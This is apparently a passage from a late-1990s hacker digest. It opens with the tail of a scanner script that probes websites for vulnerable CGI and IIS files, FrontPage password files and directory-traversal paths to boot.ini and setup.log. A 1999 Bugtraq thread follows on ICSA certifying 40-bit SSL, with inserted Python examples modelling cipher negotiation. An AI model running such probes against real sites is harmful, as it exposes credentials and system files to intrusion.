if dd == yes [ print "bnbform.cgi" ]
ee: exists? join http:// [ site "/cgi-bin/survey.cgi " ]
if ee == yes [ print "survey.cgi" ]
ff: exists? join http:// [ site "/cgi-bin/AnyForm2 " ]
if ff == yes [ print "AnyForm2" ]
gg: exists? join http:// [ site "/cgi-bin/textcounter.pl " ]
if gg == yes [ print "textcounter.pl" ]
hh: exists? join http:// [ site "/cgi-bin/classifieds.cgi " ]
if hh == yes [ print "classifieds.cgi" ]
ii: exists? join http:// [ site "/cgi-bin/environ.cgi " ]
if ii == yes [ print "environ.cgi" ]
jj: exists? join http:// [ site "/cgi-bin/wrap " ]
if jj == yes [ print "wrap" ]
kk: exists? join http:// [ site "/cgi-bin/cgiwrap " ]
if kk == yes [ print "cgiwrap" ]
ll: exists? join http:// [ site "/cgi-bin/guestbook.cgi " ]
if ll == yes [ print "guestbook.cgi" ]
mm: exists? join http:// [ site "/cgi-bin/edit.pl " ]
if mm == yes [ print "edit.pl" ]
nn: exists? join http:// [ site "/cgi-bin/perlshop.cgi " ]
if nn == yes [ print "perlshop.cgi" ]
oo: exists? join http:// [ site "/_vti_inf.html " ]
if oo == yes [ print "_vti_inf.html" ]
pp: exists? join http:// [ site "/_vti_pvt/service.pwd " ]
if pp == yes [ print "service.pwd" ]
qq: exists? join http:// [ site "/_vti_pvt/users.pwd " ]
if qq == yes [ print "users.pwd" ]
rr: exists? join http:// [ site "/_vti_pvt/authors.pwd" ]
if rr == yes [ print "authors.pwd" ]
ss: exists? join http:// [ site "/_vti_pvt/administrators.pwd " ]
if ss == yes [ print "administrators.pwd" ]
tt: exists? join http:// [ site "/_vti_pvt/shtml.dll " ]
if tt == yes [ print "shtml.dll" ]
uu: exists? join http:// [ site "/_vti_pvt/shtml.exe " ]
if uu == yes [ print "shtml.exe" ]
vv: exists? join http:// [ site "/cgi-dos/args.bat " ]
if vv == yes [ print "args.bat" ]
ww: exists? join http:// [ site "/cgi-win/uploader.exe " ]
if ww == yes [ print "uploader.exe" ]
xx: exists? join http:// [ site "/cgi-bin/rguest.exe " ]
if xx == yes [ print "rguest.exe" ]
yy: exists? join http:// [ site "/cgi-bin/wguest.exe " ]
if yy == yes [ print "wguest.exe" ]
zz: exists? join http:// [ site "/scripts/issadmin/bdir.htr " ]
if zz == yes [ print "BDir - Samples" ]
aaa: exists? join http:// [ site "/scripts/CGImail.exe " ]
if aaa == yes [ print "CGImail.exe" ]
bbb: exists? join http:// [ site "/scripts/tools/newdsn.exe " ]
if bbb == yes [ print "newdsn.exe" ]
ccc: exists? join http:// [ site "/scripts/fpcount.exe " ]
if ccc == yes [ print "fpcount.exe" ]
ddd: exists? join http:// [ site "/cfdocs/expelval/openfile.cfm " ]
if ddd == yes [ print "openfile.cfm" ]
eee: exists? join http:// [ site "/cfdocs/expelval/exprcalc.cfm " ]
if eee == yes [ print "exprcalc.cfm" ]
fff: exists? join http:// [ site "/cfdocs/expelval/displayopenedfile.cfm " ]
if fff == yes [ print "displayopenedfile.cfm" ]
ggg: exists? join http:// [ site "/cfdocs/expelval/sendmail.cfm " ]
if ggg == yes [ print "sendmail.cfm" ]
hhh: exists? join http:// [ site "/iissamples/exair/howitworks/codebrws.asp " ]
if hhh == yes [ print "codebrws.asp" ]
iii: exists? join http:// [ site "/iissamples/sdk/asp/docs/codebrws.asp " ]
if iii == yes [ print "codebrws.asp" ]
jjj: exists? join http:// [ site "/msads/Samples/SELECTOR/showcode.asp " ]
if jjj == yes [ print "showcode.asp" ]
kkk: exists? join http:// [ site "/search97.vts " ]
if kkk == yes [ print "search97.vts" ]
lll: exists? join http:// [ site "/carbo.dll " ]
if lll == yes [ print "carbo.dll" ]
mmm: exists? http-port open [
scheme: 'tcp
site "/../spool/username/mail.txt " port-id:8002]
if mmm == yes [ print "CMail" ]
nnn: exists? http-port open [
scheme: 'tcp
site "/../newuser.txt " port-id:8080]
if nnn == yes [
print "FTGte" ]
ooo: exists? http-port open [
scheme: 'tcp
site "/../../../../../boot.ini " port-id:8000]
if ooo == yes [
print "NTMail" ]
ppp: exists? http-port open [
scheme: 'tcp
site "/../../../winnt/repair/setup.log " port-id:2301]
if ppp == yes [
print "Compaq Insight" ]
@HWA
47.0 ICSA certifies weak crypto as secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 00:24:26 -0700
From: Lucky Green <shamrock@NETCOM.COM>
To: BUGTRAQ@netspace.org
Subject: ICSA certifies weak crypto as secure
I am becoming concerned about the apparent lack of professional competence
within even well-known segments of the security community. I hope the
incident I discovered is an isolated one, but even a single such incident is
disquieting.
There is a site that offers credit reports to consumers called
ConsumerInfo.com. https://www.consumerinfo.com
The site owner seems to have tried to do everything right. They joined
TrustE. They had their site certified by ICSA. They clearly have given
security a serious thought. But the company and all its customers were
severely let down by ICSA, since the highly confidential information
submitted by the user to the site is insufficiently "secured" by 40bit TLS.
And it is not as if using 128 bit would have been a challenge. The site uses
IIS and is located in the US. (Not that deploying 40 bit crypto would be
acceptable even outside the US).
I find it frightening to think that somebody calling themselves a security
professional might even consider certifying a site using 40bit SSL to
protect crucial customer information. Especially a site in the financial
sector. Certifying obfuscation as security is an unacceptable level of
performance by any computer security professional.
I would like to be able to blame simple ignorance of crypto for this deed,
which alone would be bad enough coming from a security "professional", but I
am afraid that's not possible since it is inconceivable that the certifying
ICSA member was unaware that 128 bit TLS/SSL is industry standard. Instead,
we must assume that for reasons unknown, but ultimately irrelevant, a
certification was issued for technology the issuer knew to not afford the
customer security or simply didn't bother to check the crypto strength.
Either way this condemns ICSA (a member of the Gartner Group), and reflects
very badly on our industry as a whole.
--Lucky Green <shamrock@netcom.com>
PGP 5.x encrypted email preferred
----------------------------------------------------------------------------
From: Peter Gutmann <pgut001@cs.auckland.ac.nz>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA certifies weak crypto as secure
"Lucky Green" <shamrock@netcom.com> writes:
>I am becoming concerned about the apparent lack of professional competence
>within even well-known segments of the security community. I hope the
>incident I discovered is an isolated one, but even a single such incident is
>disquieting.
[...]
>I find it frightening to think that somebody calling themselves a security
>professional might even consider certifying a site using 40bit SSL to
>protect crucial customer information. Especially a site in the financial
>sector. Certifying obfuscation as security is an unacceptable level of
>performance by any computer security professional.
I think it's pretty common, in 1997 I heard of Ernst and Young in NZ certifying
40-bit SSL as being secure for banking use. I mentioned this in a posting to
sci.crypt titled "Crypto for beancounters" and got several responses from
people saying they'd had similar experiences (not necessarily with E&Y, but
with Big 6 firms who did security audits). The summary of the responses was:
-- Snip --
[...]
- Getting a security system accepted is more likely if it's been reviewed by
the company auditors, even if the people involved don't have much experience
with the technology.
- Even if the auditors don't have much crypto experience, they're generally
very good at finding things like procedural flaws. Most real systems fail
because they're not used properly, not because of technical attacks.
Accountants/auditing firms are very good at finding problems like this.
- Some firms may have experience in auditing crypto, but more importantly they
should be able to call in outside experts to check the crypto. Requiring
that the audit report include details of how the crypto was evaluated and (if
external experts were used) by whom would be a good idea.
In summary use the auditing firm to cover security procedures, but (unless they
have expertise in the area) leave assessment of the crypto software to known
experts in the field and/or insist on seeing details of how the crypto was
assessed.
-- Snip --
It's really just an issue of being able to prove due diligence - all you need
is the right people to check the "Uses encryption" box and you're OK. Whether
the encryption is any good or not is largely irrelevant, at least for the
purposes of the exercise, which is to pass the audit.
Peter.
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 16:14:17 -0400
From: Jon McCown <jmccown@ICSA.NET>
To: BUGTRAQ@netspace.org
Subject: ICSA - Certified Sites and Criteria Issues
-----BEGIN PGP SIGNED MESSAGE-----
While I am constrained by NDAs from discussing the specific issues of
any particular ICSA customer's security issues or policy, I will
respond "in general" to Lucky Green's posting regarding the use of
40-bit cryptography as part of an ICSA certified configuration.
Participants in our site certification program (TruSecure) are
required to meet in excess of 200 criteria elements; covering such issues
as physical security, business continuity, personnel management,
network architecture, patches and updates, privacy, and sensitive
information handling. Nearly all of the criteria elements are
driven by the customer's security and operational policy-- which is
derived from their business objectives and risk management approach.
The 'specific' criteria elements which govern the use of cryptography
in the context of the customer site are (verbatim):
HUF0007: The handling procedures, security measures, and
classifications for sensitive information are documented in a
Sensitive Data Policy. The procedures identified in the policy are
in place.
HUF0014: The site's Internet Security Policy, as documented on form
TS012.01 - Security Posture and Policy, has been implemented
HUF0027: If client data is gathered by the target, then the site
must publish online its site visitor privacy, and user data security
policies.
SVC0034: Sensitive Information, as identified in HUF0007 is
encrypted and uses protocols which are acceptable to both the host and
user.
[in this context the "host" is the site operator and the "user" is
their client base]
In this context it _is_ possible for a customer to mandate (via their
own policy) use of whatever levels of cryptography they view as being
appropriate to their business model and customer requirements. For
example, if a customer policy specifies 128-bit TLS,
client-certificates, and token-based auth-- they will be validated at
that level. And if validating the server's identity to the end-user,
or no-hassle compatibility with zillions of consumers' bargain-club-PC
40-bit browsers is a goal-- a different policy might well result.
Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
encryption have become low-hanging-fruit on the confidentiality tree.
The Gilmore/EFF demonstrations and recent IETF SAG discussions have
put that writing on the wall. Do we need to add an "appropriate
crypto strength" element to the TruSecure criteria? Yes I guess we
do.
-- Jon McCown, ICSA Labs
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 16:06:17 -0700
From: Lucky Green <shamrock@NETCOM.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
> From: Jon McCown [mailto:jmccown@icsa.net]
> In this context it _is_ possible for a customer to mandate (via their
> own policy) use of whatever levels of cryptography they view as being
> appropriate to their business model and customer requirements. For
> example, if a customer policy specifies 128-bit TLS,
> client-certificates, and token-based auth-- they will be validated at
> that level. And if validating the server's identity to the end-user,
> or no-hassle compatibility with zillions of consumers' bargain-club-PC
> 40-bit browsers is a goal-- a different policy might well result.
Now I am really getting worried. From your post it is clear that you, a
representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
server you by no means prevent users limited to 40 bit crypto from accessing
it.
Sure, a server can be specifically configured to not allow access by 40 bit
browsers, but the overwhelming majority of 128 bit capable websites support
both 128 and 40 bit crypto and will automatically use the highest strength
supported by the browser. No incompatibility issues are introduced by
enabling full-strength crypto.
The site certified by ICSA did not support 128 bit crypto even to browsers
that support it. Which is, IMHO, unacceptable for a site that had their
security checked by an audit.
--Lucky
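An added example, not from any of the posts in this thread: a small Python model of SSL/TLS cipher-suite negotiation illustrating Lucky Green's point that a server offering both 128-bit and 40-bit suites still serves 40-bit browsers, while a server offering only export suites gives every client 40 bits. The suite table, server configurations and browser profiles are constructed for the illustration, and server preference order is simplified to "strongest shared suite".

```python
# Constructed subset of SSL 3/TLS 1.0 cipher suites (OpenSSL-style names) with
# the number of secret key bits each provides.  The EXP- "export" suites are
# the 40-bit ones the thread is about.  Assumption for this illustration only.
SUITE_STRENGTH = {
    "RC4-MD5": 128,
    "DES-CBC-SHA": 56,
    "EXP-RC4-MD5": 40,
    "EXP-RC2-CBC-MD5": 40,
}

# Constructed server configurations: one that enables full-strength suites and
# keeps the export ones for old browsers, and one limited to export suites.
FULL_STRENGTH_SERVER = ["RC4-MD5", "DES-CBC-SHA", "EXP-RC4-MD5", "EXP-RC2-CBC-MD5"]
EXPORT_ONLY_SERVER = ["EXP-RC4-MD5", "EXP-RC2-CBC-MD5"]

# Constructed client profiles: a domestic 128-bit browser and an export one.
DOMESTIC_BROWSER = ["RC4-MD5", "DES-CBC-SHA", "EXP-RC4-MD5", "EXP-RC2-CBC-MD5"]
EXPORT_BROWSER = ["EXP-RC4-MD5", "EXP-RC2-CBC-MD5"]


def negotiate(server_suites, client_suites):
    """Return the suite the handshake settles on: the strongest suite that the
    client offered and the server accepts, or None when there is no overlap
    (the handshake fails).  Real servers walk a preference list; ordering by
    strength here models the behaviour the post describes."""
    common = [s for s in client_suites if s in server_suites]
    if not common:
        return None
    return max(common, key=lambda s: SUITE_STRENGTH[s])


def negotiated_bits(server_suites, client_suites):
    """Secret key bits actually protecting the session, 0 if no handshake."""
    suite = negotiate(server_suites, client_suites)
    return SUITE_STRENGTH[suite] if suite else 0


def audit_server(server_suites, minimum_bits=128):
    """What an assessor should record instead of ticking "uses encryption":
    the best the server can give anyone, what a strong client actually gets,
    what an export client gets, and whether the policy minimum is met."""
    strong_client_bits = negotiated_bits(server_suites, DOMESTIC_BROWSER)
    export_client_bits = negotiated_bits(server_suites, EXPORT_BROWSER)
    return {
        "best_bits": max(SUITE_STRENGTH[s] for s in server_suites),
        "strong_client_gets": strong_client_bits,
        "export_client_gets": export_client_bits,
        "meets_minimum": strong_client_bits >= minimum_bits,
    }
```

Enabling the full-strength suites costs no compatibility: the export browser still negotiates 40 bits against FULL_STRENGTH_SERVER, while the domestic browser gets 128, which is exactly what EXPORT_ONLY_SERVER can never provide.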
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 19:23:19 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
If ICSA is
"constrained by NDAs from discussing the specific issues of any
particular ICSA customer's security issues or policy"
and
"Nearly all of the criteria elements are driven by the customer's
security and operational policy-- which is derived from their business
objectives and risk management approach."
and you say
"Do we need to add an "appropriate crypto strength" element to the
TruSecure criteria? Yes I guess we do."
then what, pray tell, should a consumer visiting
https://www.consumerinfo.com/n/security.htm?htm+l
glean from the fact that the page linked on their site from your ICSA
icon contains the following;
"ConsumerInfo.Com employs sophisticated encryption"
and further states;
"In addition to employing these high-security measures, ConsumerInfo.Com
has undergone the rigorous certification process for the International
Computer Security Association's (ICSA) Web Certification program. This
process examined every aspect of our security precautions, encompassing
an on-site inspection of our facility for physical security and policy
plus a remote assessment of our potential vulnerabilities to web-based
attacks. In addition, the ICSA's certification is a continuous process,
repeated several times during the year and renewed annually, so you know
ConsumerInfo.Com's security measures are state-of-the-art."
However, the bottom line is that;
- They are *NOT* employing "sophisticated encryption", they're employing
the least sophisticated deployable.
- They also say ICSA "examined every aspect of our security
precautions", but in fact, you only examined those aspects defined in
their policies.
- They also claim that because of your certification, their customers
"know ConsumerInfo.Com's security measures are state-of-the-art" when in
fact they're *NOT*.
I will not, at this time, question the integrity of ICSA. Nor will I
suggest that ConsumerInfo.Com is out and out lying.
I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
to mislead their customers via the ICSA Web Certification approval. By
ICSA not being permitted, by NDA, to discuss certification they have
performed, it renders, IMNSHO, the certification itself *worthless*. It
would appear that ConsumerInfo.Com has been allowed to say anything they
want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
ICSA Web Certification reports should be public, or, not trusted.
Cheers,
Russ - NTBugtraq Editor
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 18:46:47 -0400
From: Adam Shostack <adam@HOMEPORT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
You can ISO9001 certify the process of shooting yourself in the foot,
so long as the process is documented and reliably produces the proper
result.
Do you require certified sites post their security policy? If not,
how do I know that the policy doesn't explicitly accept the presence
of phf in /cgi-bin? Would it be possible to have that in my policy
and still get certified, if I have good business reasons for putting
it in place?
This flap may be a result of certifying compliance to policy, but the
relying parties on your mark should not be expected to be able to read
and understand those policies; they should be able to rely on your
mark to say that the policies make sense. Incidentally, do you
require sites to post these policies to which you certify compliance?
I think that the high level message here (and from the
TRUSTe/Microsoft crap) is that what organizations like ICSA and Truste
are certifying is not what people who may be expected to rely on those
marks expect is being certified.
Adam
On Thu, May 27, 1999 at 04:14:17PM -0400, Jon McCown wrote:
| -----BEGIN PGP SIGNED MESSAGE-----
|
| While I am constrained by NDAs from discussing the specific issues of
| any particular ICSA customer's security issues or policy, I will
| respond "in general" to Lucky Green's posting regarding the use of
| 40-bit cryptography as part of an ICSA certified configuration.
|
| Participants in our site certification program (TruSecure) are
| required to meet in excess of 200 criteria elements; covering such issues
| as physical security, business continuity, personnel management,
| network architecture, patches and updates, privacy, and sensitive
| information handling. Nearly all of the criteria elements are
| driven by the customer's security and operational policy-- which is
| derived from their business objectives and risk management approach.
|
| The 'specific' criteria elements which govern the use of cryptography
| in the context of the customer site are (verbatim):
|
| HUF0007: The handling procedures, security measures, and
| classifications for sensitive information are documented in a
| Sensitive Data Policy. The procedures identified in the policy are
| in place.
| HUF0014: The site's Internet Security Policy, as documented on form
| TS012.01 - Security Posture and Policy, has been implemented
| HUF0027: If client data is gathered by the target, then the site
| must publish online its site visitor privacy, and user data security
| policies.
| SVC0034: Sensitive Information, as identified in HUF0007 is
| encrypted and uses protocols which are acceptable to both the host and
| user.
| [in this context the "host" is the site operator and the "user" is
| their client base]
|
| In this context it _is_ possible for a customer to mandate (via their
| own policy) use of whatever levels of cryptography they view as being
| appropriate to their business model and customer requirements. For
| example, if a customer policy specifies 128-bit TLS,
| client-certificates, and token-based auth-- they will be validated at
| that level. And if validating the server's identity to the end-user,
| or no-hassle compatibility with zillions of consumers' bargain-club-PC
| 40-bit browsers is a goal-- a different policy might well result.
|
| Yes, we (ICSA Labs) do agree that 40-bit/8-second, and even 56-bit
| encryption have become low-hanging-fruit on the confidentiality tree.
| The Gilmore/EFF demonstrations and recent IETF SAG discussions have
| put that writing on the wall. Do we need to add an "appropriate
| crypto strength" element to the TruSecure criteria? Yes I guess we
| do.
|
| - - Jon McCown, ICSA Labs
|
|
|
--
"It is seldom that liberty of any kind is lost all at once."
-Hume
----------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:44:47 -0700
From: David Schwartz <davids@WEBMASTER.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
So does ICSA certification mean simply that a company has met its own
requirements? (As opposed to some set of objectively validated or
ICSA-imposed requirements?)
DS
> Participants in our site certification program (TruSecure) are
> required to meet in excess of 200 criteria elements; covering such issues
> as physical security, business continuity, personnel management,
> network architecture, patches and updates, privacy, and sensitive
> information handling. Nearly all of the criteria elements are
> driven by the customer's security and operational policy-- which is
> derived from their business objectives and risk management approach.
[snip]
> In this context it _is_ possible for a customer to mandate (via their
> own policy) use of whatever levels of cryptography they view as being
> appropriate to their business model and customer requirements. For
> example, if a customer policy specifies 128-bit TLS,
> client-certificates, and token-based auth-- they will be validated at
> that level. And if validating the server's identity to the end-user,
> or no-hassle compatibility with zillions of consumers' bargain-club-PC
> 40-bit browsers is a goal-- a different policy might well result.
[snip]
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 11:09:08 +0100
From: Simon Liddington <sjl96v@ECS.SOTON.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
Lucky Green <shamrock@NETCOM.COM> writes:
> Sure, a server can be specifically configured to not allow access by 40 bit
> browsers, but the overwhelming majority of 128 bit capable websites support
> both 128 and 40 bit crypto and will automatically use the highest strength
> supported by the browser. No incompatibility issues are introduced by
> enabling full-strength crypto.
In my experience with Netscape and apache-SSL the lowest strength
cipher (apart from no cipher at all) is used. Unless you disable the
weaker ciphers in Netscape, netscape tries them first and will connect
if the server allows them.
Of course this doesn't invalidate your statement that there is no
problem with enabling full-strength crypto, but it does mean there is
also little to gain by doing so.
Simon
--
-----------------------------------------------------------------------
| Simon Liddington | |
| E-Mail : sjl96v@ecs.soton.ac.uk | Tel (work) : +44 (0)1703 592422 |
-----------------------------------------------------------------------
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 13:48:30 -0500
From: Jeremey Barrett <jeremey@TERISA.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
On Fri, May 28, 1999 at 11:09:08AM +0100, Simon Liddington wrote:
> Lucky Green <shamrock@NETCOM.COM> writes:
>
> > Sure, a server can be specifically configured to not allow access by 40 bit
> > browsers, but the overwhelming majority of 128 bit capable websites support
> > both 128 and 40 bit crypto and will automatically use the highest strength
> > supported by the browser. No incompatibility issues are introduced by
> > enabling full-strength crypto.
>
> In my experience with Netscape and apache-SSL the lowest strength
> cipher (apart from no cipher at all) is used. Unless you disable the
> weaker ciphers in Netscape, netscape tries them first and will connect
> if the server allows them.
A client in SSL sends all its supported ciphers at once, it doesn't "try"
some, then "try" others. The server chooses which cipher to use from amongst
those the client supports. If you have 128-bit capable Netscape, and 128-bit
capable Apache SSL, or a Netscape server, or Stronghold, or whatever, you get
full strength crypto, unless there's a bug in the server.
Obviously if one or the other doesn't support it, you don't.
Regards,
Jeremey.
--
Jeremey Barrett <jeremey@terisa.com>
GPG fingerprint = 7BB2 E1F1 5559 3718 CE25 565A 8455 D60B 8FE8 B38F
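To make the negotiation point in the Liddington/Barrett exchange concrete, here is a small Python model of SSLv3/TLS cipher-suite selection. It is an added example for this digest, not code from any of the posters; the suite names, key strengths and the ordering of each client and server list are constructed assumptions.

```python
"""Model of SSLv3/TLS cipher-suite selection (added example, not posters' code).

The suite table, client lists and server lists below are constructed for
illustration; the point is the selection rule, not the exact suites a
1999 browser shipped with.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Suite:
    name: str
    key_bits: int  # symmetric key strength in bits


# Constructed suite table (names follow OpenSSL-style conventions).
DES_CBC3_SHA = Suite("DES-CBC3-SHA", 168)
RC4_128_MD5 = Suite("RC4-MD5", 128)
DES_CBC_SHA = Suite("DES-CBC-SHA", 56)
EXP_RC4_40_MD5 = Suite("EXP-RC4-MD5", 40)  # 40-bit "export" cipher


def negotiate(client_offer: List[Suite], server_enabled: List[Suite],
              honor_client_order: bool = True) -> Optional[Suite]:
    """Pick the suite the server would choose, or None if nothing overlaps.

    The client sends its whole cipher list in one ClientHello (Barrett's
    point); the server then selects a single suite from the intersection.
    Whether it takes the first usable suite in the *client's* order or the
    first in its *own* preference list is a server-side decision, and that
    is what decides whether Liddington's "weakest cipher wins" happens.
    """
    if honor_client_order:
        enabled = {s.name for s in server_enabled}
        return next((s for s in client_offer if s.name in enabled), None)
    offered = {s.name for s in client_offer}
    return next((s for s in server_enabled if s.name in offered), None)


def harden(server_enabled: List[Suite], min_bits: int = 128) -> List[Suite]:
    """Defender's fix: drop every suite below the minimum key strength."""
    return [s for s in server_enabled if s.key_bits >= min_bits]


def weak_suites(server_enabled: List[Suite], min_bits: int = 128) -> List[str]:
    """Audit helper: names of enabled suites a client could end up on."""
    return [s.name for s in server_enabled if s.key_bits < min_bits]


# Constructed server list in the server's own preference order.
FULL_SERVER = [RC4_128_MD5, DES_CBC3_SHA, DES_CBC_SHA, EXP_RC4_40_MD5]
# Constructed 128-bit-capable browser that lists its weak suites first.
BROWSER_WEAK_FIRST = [EXP_RC4_40_MD5, DES_CBC_SHA, RC4_128_MD5, DES_CBC3_SHA]
# Constructed export-restricted browser: 40-bit only.
EXPORT_BROWSER = [EXP_RC4_40_MD5]


def run_scenarios() -> dict:
    """Key-strength outcome per case (bits, or None for a failed handshake)."""
    strong_only = harden(FULL_SERVER)

    def bits(suite: Optional[Suite]) -> Optional[int]:
        return suite.key_bits if suite else None

    return {
        # Liddington's observation: server walks the client's list, weak first.
        "client_order_weak_first": bits(negotiate(BROWSER_WEAK_FIRST, FULL_SERVER)),
        # Same peers, but the server applies its own preference order.
        "server_preference": bits(negotiate(BROWSER_WEAK_FIRST, FULL_SERVER, False)),
        # Export suites removed server-side: client order no longer matters.
        "hardened_client_order": bits(negotiate(BROWSER_WEAK_FIRST, strong_only)),
        # Green's point: a server with 128-bit suites enabled does not lock out
        # a 40-bit browser as long as it still enables the 40-bit suites.
        "export_browser_full_server": bits(negotiate(EXPORT_BROWSER, FULL_SERVER)),
        # Refusing the weak suites is the only way to exclude 40-bit clients.
        "export_browser_hardened": bits(negotiate(EXPORT_BROWSER, strong_only)),
        "weak_suites_on_full_server": weak_suites(FULL_SERVER),
    }


if __name__ == "__main__":
    for case, outcome in run_scenarios().items():
        print(f"{case:30s} -> {outcome}")
```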
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 16:39:03 -0400
From: David Kennedy CISSP <dmkennedy@COMPUSERVE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: ICSA - Certified Sites and Criteria Issues
I'm taking it upon myself to respond for Jon who's busy trying to
have a life outside the office. As he did, I'm going to try to steer
clear of a specific discussion of any of our customers.
We thank the open review process of the total crypto community for
bringing this to our attention. We will include this discussion in
our ongoing process to maintain the TruSecure criteria.
I'd like to restate what I feel is the most pertinent criterion that
bears on this issue: the criterion requires encryption and protocols
acceptable to both the host and the client. As a practical matter,
for web activity this is either 40-bit SSL or 128-bit SSL. The
TruSecure customers have the flexibility to choose, and their
customers, in turn, decide if this is "acceptable."
Clearly, most of the readers of these lists regard 128-bit SSL as the
minimum they would find acceptable. However I think those same
readers would acknowledge that the majority of users on the Internet
worldwide today are using a 40-bit version of the popular browsers. A
business has every right to decide if 40-bit SSL is the level of
security they feel is appropriate for the information they are
processing.
A TruSecure customer may make a business decision that 40-bit SSL is
"acceptable" for the communication of data from their hosts to their
clients. Once this decision is made, they may configure their systems
for 40-bit only.
It should be clear from Jon's previous message that, in the abstract,
128-bit SSL is preferable to 40-bit SSL. However, 40-bit SSL for all
its faults, protects data in transit from the client to the host from
all but a targeted attack by an experienced, well-resourced adversary.
40-bit SSL provides superior security to the majority of meatspace
exchanges of sensitive information.
At 07:53 PM 5/27/99 -0400, David Schwartz wrote:
>
> So does ICSA certification mean simply that a company has met its own
>requirements? (As opposed to some set of objectively validated or
>ICSA-imposed requirements?)
Certification requires compliance with our criteria. The best web
page we have describing this is: http://www.trusecure.net/process.html
If you want the nitty gritty details, browse to
http://www.trusecure.net/
and either go to the library or click the "contact us" link.
ICSA helps customers address risks across multiple categories
(physical, hacking, malicious code, spoofing, eavesdropping, lack of
knowledge/awareness, lack of trust, DoS, privacy-user by site & data
subject, lack of interoperability). We developed a methodology to
focus on high risk/cost categories and follow this methodology with
our customers. When addressing the issue of privacy, ICSA approaches
the matter by addressing the risk of capturing customer information
across the wire and as it resides on the customers server. We do
require the use of encryption but choose to let the customer to decide
the level based on the assets they are protecting, the impact to their
business, and the fact that the real concern is the data residing on
the server un-encrypted. ICSA therefore works with our customers to
set up multiple layers of synergistic controls that not only address
the use of encryption but also those mentioned above.
We rely on addressing our customers' issues not only from a
technology perspective, but from a business level one as well. When
deploying security, ICSA will always address how technology impacts
our customers operations and costs.
At 07:31 PM 5/27/99 -0400, Adam Shostack wrote:
>Do you require certified sites post their security policy? If not,
>how do I know that the policy doesn't explicitly accept the presence
>of phf in /cgi-bin? Would it be possible to have that in my policy
>and still get certified, if I have good business reasons for putting
>it in place?
>
For the purposes of site certification we would not certify a site
with phf in the cgi-bin directory. Our criteria do restrict this.
However, we have customers who have purchased TruSecure but have "good
business reasons" for ignoring or violating one or more of our
criteria. ICSA has a process to review these occurrences and have
withheld certification from some of these customers. Indeed, we have
customers who are quite satisfied with their TruSecure purchase
without achieving certification. Without turning into a
sales/marketing droid, we try to emphasize TruSecure as a process to
provide acceptable security to the customer; many customers are
satisfied without completing certification and know this before their
purchase.
>This flap may be a result of certifying compliance to policy, but the
>relying parties on your mark should not be expected to be able to read
>and understand those policies; they should be able to rely on your
>mark to say that the policies make sense. Incidentally, do you
>require sites to post these policies to which you certify compliance?
>
Certified sites must post a privacy and user data security policy as
part of our criteria. We do not require the site to post their
security policy. Most enterprises would be reluctant to post an
un-sanitized version of their security policies which opens the
question of how much sanitization is necessary or desirable. I don't
believe it would be wise to require they post the nitty gritty details
of their policies. One would not want details such as these widely
known:
Inbound telnet is blocked except from IP xxx.xxx.xxx.xxx to
yyy.yyy.yyy.yyy which is permitted so Y Inc can review progress
reports on Project Z.
Employees assigned to our office in Sri Lanka will use PPTP to host
at zzz.zzz.zzz.zzz to access the company intranet.
At 07:36 PM 5/27/99 -0400, Russ wrote:
>However, the bottom line is that;
>
>- They are *NOT* employing "sophisticated encryption", they're employing
>the least sophisticated deployable.
>
I can't respond to this directly.
>- They also say ICSA "examined every aspect of our security
>precautions", but in fact, you only examined those aspects defined in
>their policies.
For any customer, we examine every aspect defined by *our* criteria,
which includes examining their security policies and implementations,
but these two aspects are but a handful of the 200+ criteria we
include in TruSecure.
>
>- They also claim that because of your certification, their customers
>"know ConsumerInfo.Com's security measures are state-of-the-art" when in
>fact they're *NOT*.
This issue is with the semantics on a page not maintained by ICSA.
>
>I will not, at this time, question the integrity of ICSA. Nor will I
>suggest that ConsumerInfo.Com is out and out lying.
>
>I will, however, suggest that ICSA is tacitly allowing ConsumerInfo.Com
>to mislead their customers via the ICSA Web Certification approval. By
>ICSA not being permitted, by NDA, to discuss certification they have
>performed, it renders, IMNSHO, the certification itself *worthless*. It
>would appear that ConsumerInfo.Com has been allowed to say anything they
>want about their work with ICSA and, by NDA, ICSA cannot rebuke it.
>
The way this paragraph is constructed makes it impossible to respond
to it. We would like to respond, and explain how certification is not
as you say, "worthless," but to do so would be to reveal confidential
information about a customer.
At 07:36 PM 5/27/99 -0400, Lucky Green wrote:
>
>Now I am really getting worried. From your post it is clear that you, a
>representative of ICSA, are unaware that by enabling 128 bit TLS/SSL on a
>server you by no means prevent users limited to 40 bit crypto from accessing
>it.
>
Incorrect, we understand this fact.
Again, the criteria require encryption and protocols acceptable to
both the host and the client. Popular browsers provide the capability
for users to click on an icon and determine the encryption being used,
if any. Undoubtedly that's how this thread started.
Regards,
David Kennedy CISSP
Director of Research Services, ICSA Inc. http://www.icsa.net
Using encryption on the Internet is the equivalent of arranging
an armored car to deliver credit-card information from someone
living in a cardboard box to someone living on a park bench.
Gene Spafford
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 20:08:35 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: Re: [ISN] ICSA certifies weak crypto as secure
